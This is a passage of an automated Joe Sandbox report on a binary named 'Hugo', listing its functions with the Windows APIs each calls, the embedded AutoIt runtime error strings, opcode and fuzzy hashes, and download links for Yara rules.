Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 5e8be36ee5ae6ce55987213eb65d0955967a619e24e50eb8004ddb451d57316f
Instruction ID: a02861ace88ead32a37fc6880433dd956cd386842dd4a5128e5de2b4ac698448
Opcode Fuzzy Hash: 5e8be36ee5ae6ce55987213eb65d0955967a619e24e50eb8004ddb451d57316f
Instruction Fuzzy Hash: 7BD1A071E0060A9FEF11CFA8C885BAEB7B5FF88714F14816AE915AB280E770DD45DB50

Function 00F518A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00F51B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 00F5194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F519D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00F51B7B,?,00F51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F51A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00F51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F51A7B

Part of subcall function 00F43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F36A79,?,0000015D,?,?,?,?,00F385B0,000000FF,00000000,?,?), ref: 00F43BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00F51B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00F51AF7
__freea.LIBCMT ref: 00F51B22
__freea.LIBCMT ref: 00F51B2E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 4610e70d42826a9e5ebaae6be15bd0f5c79dcfe0e702b55c8e7937601528c8e2
Instruction ID: 4f5f299c86ad1fbff3d84e2dd8687809a6cfddc6a7e5ec0bdbad12ca4ab5fd18
Opcode Fuzzy Hash: 4610e70d42826a9e5ebaae6be15bd0f5c79dcfe0e702b55c8e7937601528c8e2
Instruction Fuzzy Hash: 5691B572E00216AADB218E64CC91FEE7BB5FF49322F180659EE15E7140E735ED48E760

Function 00F94F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F950A5
VariantInit.OLEAUT32(?), ref: 00F951A6
VariantClear.OLEAUT32(?), ref: 00F951B0
VariantClear.OLEAUT32(?), ref: 00F9520D

Strings

Null Object assignment in FOR..IN loop, xrefs: 00F95035, 00F95163, 00F9521B
Incorrect Object type in FOR..IN loop, xrefs: 00F95189

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: cdf8c403c2093c8bbe64b7ec41ba40cf35c88787307e9b12e292ed9af5ed8b0a
Instruction ID: 8b514f7df446a830fa6fd2789aa0b138601176e4ca95361d0b5678a689666605
Opcode Fuzzy Hash: cdf8c403c2093c8bbe64b7ec41ba40cf35c88787307e9b12e292ed9af5ed8b0a
Instruction Fuzzy Hash: 9091AF71E00619ABEF25CFA5CC48FAEBBB8EF45B24F108519F505AB280D7709945DFA0

Function 00F81B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F81C1B
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F81C43
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00F81C67
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F81C97
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F81D1E
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F81D83
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00F81DEF

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 4315e4cfabe4000e078d81d8fce831c5e45064505646ee8feaf9149f27a80a68
Instruction ID: 3188afaf0ab6e810983a4fbf9e622829d043c301ecb9196cf222efebbec9e724
Opcode Fuzzy Hash: 4315e4cfabe4000e078d81d8fce831c5e45064505646ee8feaf9149f27a80a68
Instruction Fuzzy Hash: AD91F472A002199FDB01EF94C885BFEB7B8FF05721F104219E941EB291D778A942EB90

Function 00F943A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F943C8
CharUpperBuffW.USER32(?,?), ref: 00F944D7
_wcslen.LIBCMT ref: 00F944E7
VariantClear.OLEAUT32(?), ref: 00F9467C

Part of subcall function 00F8169E: VariantInit.OLEAUT32(00000000), ref: 00F816DE
Part of subcall function 00F8169E: VariantCopy.OLEAUT32(?,?), ref: 00F816E7
Part of subcall function 00F8169E: VariantClear.OLEAUT32(?), ref: 00F816F3

Strings

AUTOIT.ERROR, xrefs: 00F944DD, 00F944E2
Incorrect Parameter format, xrefs: 00F94403, 00F945FE

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: e39c16fa0c5f8baefee09ad2afbe6a03d30f12641a9f83dca52835c0950e0a76
Instruction ID: ca651197b54db00686ccaf5361fe29b8cbc30991e0800443c82aa822ac100c5a
Opcode Fuzzy Hash: e39c16fa0c5f8baefee09ad2afbe6a03d30f12641a9f83dca52835c0950e0a76
Instruction Fuzzy Hash: 98917B75A043019FCB04DF68C88096AB7E5FF99714F14892DF88A87351DB35ED46DB82

Function 00F9560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00F708FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?,?,00F70C4E), ref: 00F7091B
Part of subcall function 00F708FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?), ref: 00F70936
Part of subcall function 00F708FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?), ref: 00F70944
Part of subcall function 00F708FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?), ref: 00F70954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00F956AE
_wcslen.LIBCMT ref: 00F957B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00F9582C
CoTaskMemFree.OLE32(?), ref: 00F95837

Strings

NULL Pointer assignment, xrefs: 00F95880, 00F958AF

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 3a08651847027cb6848fd66e511f894b779b0cbdbe765b6fd77c4c957eadded0
Instruction ID: 46ef352419843f828883f26f4751e760810c4dfdf0b488de151e24a25e786534
Opcode Fuzzy Hash: 3a08651847027cb6848fd66e511f894b779b0cbdbe765b6fd77c4c957eadded0
Instruction Fuzzy Hash: 47912671D0021DEBEF15DFA4DC81AEEB7B8BF08710F10416AE915A7241EB349A44EF60

Function 00FA2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00FA2C1F
GetMenuItemCount.USER32(00000000), ref: 00FA2C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FA2C79
_wcslen.LIBCMT ref: 00FA2CAF
GetMenuItemID.USER32(?,?), ref: 00FA2CE9
GetSubMenu.USER32(?,?), ref: 00FA2CF7

Part of subcall function 00F74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F743AD
Part of subcall function 00F74393: GetCurrentThreadId.KERNEL32 ref: 00F743B4
Part of subcall function 00F74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F72F00), ref: 00F743BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FA2D7F

Part of subcall function 00F7F292: Sleep.KERNEL32 ref: 00F7F30A

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 864760b5ae2c1ec9239d06ff96e051c91eedb94fd07e54c2e2e047f29e07dc33
Instruction ID: edddd8113405db8dd8b1083efe80be791343e6ca1dbd6de3c8f1ba02a88bf7b5
Opcode Fuzzy Hash: 864760b5ae2c1ec9239d06ff96e051c91eedb94fd07e54c2e2e047f29e07dc33
Instruction Fuzzy Hash: 3B7172B5E00205AFCB54EF68C845AAEB7F5EF49320F148459E816EB351DB34ED41EB90

Function 00FA88F9 Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00FA8992
IsWindowEnabled.USER32(00000000), ref: 00FA899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00FA8A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00FA8AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00FA8AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00FA8B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00FA8B1E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: e4011b38f708840f52bf2eb4922169599221ae685df19436048ad5e7d7fa9ecc
Instruction ID: 10fa9ee71b87b0ca3e150f459291511068c2eebd7cab74c5e06eacde9c867f24
Opcode Fuzzy Hash: e4011b38f708840f52bf2eb4922169599221ae685df19436048ad5e7d7fa9ecc
Instruction Fuzzy Hash: F371B2B4A00208BFDB259F54CC84FBABBB9FF4B3A0F140459E85557251CBB5A942FB11

Function 00F7B881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00F7B8C0
GetKeyboardState.USER32(?), ref: 00F7B8D5
SetKeyboardState.USER32(?), ref: 00F7B936
PostMessageW.USER32(?,00000101,00000010,?), ref: 00F7B964
PostMessageW.USER32(?,00000101,00000011,?), ref: 00F7B983
PostMessageW.USER32(?,00000101,00000012,?), ref: 00F7B9C4
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F7B9E7

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 5774e63a4e408887170e26d121d13cb546599469a608182e59436ab24fab7ec9
Instruction ID: f9300870eaa217a8f6a1d1f495212e1286cb92e49d0a0ae4a4cf79559c47d3ed
Opcode Fuzzy Hash: 5774e63a4e408887170e26d121d13cb546599469a608182e59436ab24fab7ec9
Instruction Fuzzy Hash: AF51C1A1A087D53EFB3642388C55BBA7EA95B07714F08C48AE2DD458D2C3D8ADC4E752

Function 00F7B6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00F7B6E0
GetKeyboardState.USER32(?), ref: 00F7B6F5
SetKeyboardState.USER32(?), ref: 00F7B756
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F7B782
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F7B79F
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F7B7DE
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F7B7FF

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6cbb11828811ea366c0f9fc1c3c2352617680701a2f6dc50106e2b26ad3777ba
Instruction ID: bceaaddfa34911b72e4e6b5e24928f6274cd7289819cd460a13c33d205602087
Opcode Fuzzy Hash: 6cbb11828811ea366c0f9fc1c3c2352617680701a2f6dc50106e2b26ad3777ba
Instruction Fuzzy Hash: 2551EFA0D086D53EFB368324CC55B7ABEA95B47314F0CC48AE1DD4A8C2D394A885F762

Function 00F457A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00F45F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00F457E3
__fassign.LIBCMT ref: 00F4585E
__fassign.LIBCMT ref: 00F45879
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00F4589F
WriteFile.KERNEL32(?,FF8BC35D,00000000,00F45F16,00000000,?,?,?,?,?,?,?,?,?,00F45F16,?), ref: 00F458BE
WriteFile.KERNEL32(?,?,00000001,00F45F16,00000000,?,?,?,?,?,?,?,?,?,00F45F16,?), ref: 00F458F7

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 09af86b056d92aae0bc8b844a187e4d8de50a29cebf43ec654c324251a6bf883
Instruction ID: 75aff3530478a7edc5256733d43b3ba42167a2a1aabfdbf4acc3bd672a93d2b3
Opcode Fuzzy Hash: 09af86b056d92aae0bc8b844a187e4d8de50a29cebf43ec654c324251a6bf883
Instruction Fuzzy Hash: A651B0B1E006489FDB10DFA8DC81AEEBBB8EF09720F14411AE952E7292D7309941DB60

Function 00F33090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00F330BB
___except_validate_context_record.LIBVCRUNTIME ref: 00F330C3
_ValidateLocalCookies.LIBCMT ref: 00F33151
__IsNonwritableInCurrentImage.LIBCMT ref: 00F3317C
_ValidateLocalCookies.LIBCMT ref: 00F331D1

Strings

csm, xrefs: 00F33166

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: c48c2bc97a7930528bc9880c06aa27e788df865c8ec541cc7c28221b91179969
Instruction ID: a033cfc6b85f12dcc4105a90938a19259d485f96fa86e7a91f721a8674d02f89
Opcode Fuzzy Hash: c48c2bc97a7930528bc9880c06aa27e788df865c8ec541cc7c28221b91179969
Instruction Fuzzy Hash: 8F41C534E002189BCF10EF68CC85A9EBBB5BF45378F148155E815AB392D735EB05EB91

Function 00F91B15 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F93AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F93AD7
Part of subcall function 00F93AAB: _wcslen.LIBCMT ref: 00F93AF8

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F91B6F
WSAGetLastError.WSOCK32 ref: 00F91B7E
WSAGetLastError.WSOCK32 ref: 00F91C26
closesocket.WSOCK32(00000000), ref: 00F91C56

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: febcf83a7769ba918a431e42f020468d7dd0f153aa0fcbe12a3b61f073f1dccc
Instruction ID: 73020c0ce43e1cfc120aad2d95d9452f7cbdb610fa5e1657f630b3abc7ff33f0
Opcode Fuzzy Hash: febcf83a7769ba918a431e42f020468d7dd0f153aa0fcbe12a3b61f073f1dccc
Instruction Fuzzy Hash: EB41D671600119AFEB109F24C844BE9BBE9FF85324F148069FC169B291D774ED81DBE1

Function 00F7D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F7D7CD,?), ref: 00F7E714

Part of subcall function 00F7E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F7D7CD,?), ref: 00F7E72D

lstrcmpiW.KERNEL32(?,?), ref: 00F7D7F0
MoveFileW.KERNEL32(?,?), ref: 00F7D82A
_wcslen.LIBCMT ref: 00F7D8B0
_wcslen.LIBCMT ref: 00F7D8C6
SHFileOperationW.SHELL32(?), ref: 00F7D90C

Strings

\*.*, xrefs: 00F7D89E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 0046354b36f42acc7f3f2cdd31f0961dec1677d833971f9b70b62da35fd0b4a5
Instruction ID: 0e00de092c738028ded3da50931660129abc9b0aa768742a41fa1fc30b6a2913
Opcode Fuzzy Hash: 0046354b36f42acc7f3f2cdd31f0961dec1677d833971f9b70b62da35fd0b4a5
Instruction Fuzzy Hash: D7415571D0521C9EDF12EBA4DD81ADD77B8AF08350F5040EBA509EB141EB39A788EB52

Function 00FA3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00FA38B8
GetWindowLongW.USER32(?,000000F0), ref: 00FA38EB
GetWindowLongW.USER32(?,000000F0), ref: 00FA3920
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00FA3952
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00FA397C
GetWindowLongW.USER32(?,000000F0), ref: 00FA398D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FA39A7

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d655451e281edf90b086d28d0acfa743b887b5c691851b973c09d5e77da74bb0
Instruction ID: 74f1c40d26734ad47acfa6fa3bcc17c2af4bc304f33ffc568e55c510c3ab9637
Opcode Fuzzy Hash: d655451e281edf90b086d28d0acfa743b887b5c691851b973c09d5e77da74bb0
Instruction Fuzzy Hash: 693155B1A44289AFDB21CF48DC84F6937A5FB8B320F1411A4F5158F2B2CB74A944FB11

Function 00F7808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F780D0
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F780F6
SysAllocString.OLEAUT32(00000000), ref: 00F780F9
SysAllocString.OLEAUT32(?), ref: 00F78117
SysFreeString.OLEAUT32(?), ref: 00F78120
StringFromGUID2.OLE32(?,?,00000028), ref: 00F78145
SysAllocString.OLEAUT32(?), ref: 00F78153

Memory Dump Source

